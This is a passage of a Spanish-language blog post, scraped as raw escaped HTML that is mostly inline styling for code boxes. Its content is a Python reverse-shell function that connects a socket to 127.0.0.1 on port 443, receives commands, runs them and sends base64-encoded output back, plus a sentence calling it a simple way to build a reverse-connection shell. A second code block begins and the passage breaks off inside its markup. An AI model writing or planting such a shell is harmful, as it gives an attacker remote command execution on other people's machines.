rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;line number5 index4 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;line number6 index5 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;line number7 index6 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;line number8 index7 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;line number9 index8 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;line number10 index9 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;line number11 index10 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;11&lt;/div&gt;&lt;div class=&quot;line number12 index11 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;12&lt;/div&gt;&lt;div class=&quot;line number13 index12 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;13&lt;/div&gt;&lt;div class=&quot;line number14 index13 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;14&lt;/div&gt;&lt;div class=&quot;line number15 index14 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;15&lt;/div&gt;&lt;div class=&quot;line number16 index15 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;16&lt;/div&gt;&lt;div class=&quot;line number17 index16 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;17&lt;/div&gt;&lt;div class=&quot;line number18 index17 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;18&lt;/div&gt;&lt;div class=&quot;line number19 index18 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;19&lt;/div&gt;&lt;div class=&quot;line number20 index19 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;20&lt;/div&gt;&lt;div class=&quot;line number21 index20 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;21&lt;/div&gt;&lt;div class=&quot;line number22 index21 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;22&lt;/div&gt;&lt;div class=&quot;line number23 index22 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;23&lt;/div&gt;&lt;div class=&quot;line number24 index23 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;24&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 1128px;&quot;&gt;&lt;div class=&quot;container&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;div class=&quot;line number1 index0 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;&lt;code class=&quot;python keyword&quot; style=&quot;background: none !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(0, 102, 153) !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 1em !important; font-weight: bold !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;def&lt;/code&gt; &lt;code class=&quot;python plain&quot; style=&quot;background: none !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: black !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;shell():&lt;/code&gt;&lt;/div&gt;&lt;div class=&quot;line number1 index0 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;&lt;code class=&quot;python plain&quot; style=&quot;background: none !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: black !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;br /&gt;&lt;/code&gt;&lt;/div&gt;&lt;div class=&quot;line number2 index1 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;&amp;nbsp; &amp;nbsp;#Base64 encoded reverse shell&lt;br /&gt;&amp;nbsp; &amp;nbsp;try:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;s.connect((&#39;127.0.0.1&#39;, int(443)))&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;s.send(&#39;[*] Connection Established!&#39;)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;while 1:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;cmd = s.recv(1024)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if cmd == &quot;quit&quot;:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;break&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;response = run_cmd(cmd)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if response:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;encoded = base64.b64encode(response)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;else:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;response = &#39;Running: {}&#39;.format(cmd)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;encoded = base64.b64encode(response)&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;s.send(encoded)&lt;br /&gt;&amp;nbsp; &amp;nbsp; except socket.error:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;sys.exit(2)&lt;br /&gt;&amp;nbsp; &amp;nbsp; except WindowsError:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;pass&lt;br /&gt;&amp;nbsp; &amp;nbsp; finally:&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;s.close()&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;Es un fragmento de como se puede implementar una &quot;Shell&quot; de conexión inversa en python de forma sencilla. Falta por supuesto como ejecutar comandos en el sistema:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-collapse: collapse; border-radius: 0px !important; border-spacing: 0px; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: #0a0a0a; direction: ltr !important; float: none !important; font-family: Consolas, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, Courier, monospace !important; font-size: 15px; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; max-width: 100%; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; table-layout: auto !important; top: auto !important; vertical-align: baseline !important; width: 1170px;&quot;&gt;&lt;tbody style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;tr style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;td class=&quot;gutter&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; color: rgb(175, 175, 175) !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;&quot;&gt;&lt;div class=&quot;line number1 index0 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;line number2 index1 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;line number3 index2 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;3 &amp;nbsp;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;line number4 index3 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;line number5 index4 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;line number6 index5 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;line number7 index6 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;line number8 index7 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;line number9 index8 alt2&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;line number10 index9 alt1&quot; style=&quot;background: none white !important; border-radius: 0px !important; border-right-color: rgb(108, 226, 108) !important; border-right-style: solid !important; border-width: 0px 3px 0px 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 0.5em 0px 1em !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;&quot;&gt;10&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;code&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: 1128px;&quot;&gt;&lt;div class=&quot;container&quot; style=&quot;background-attachment: initial !important; background-clip: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial !important; background-repeat: initial !important; background-size: initial !important; border-radius: 0px !important; border: 0px !important; bottom: auto !important; box-shadow: none !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: relative !important; right: auto !important; top: auto !important; vertical-align: baseline !important; 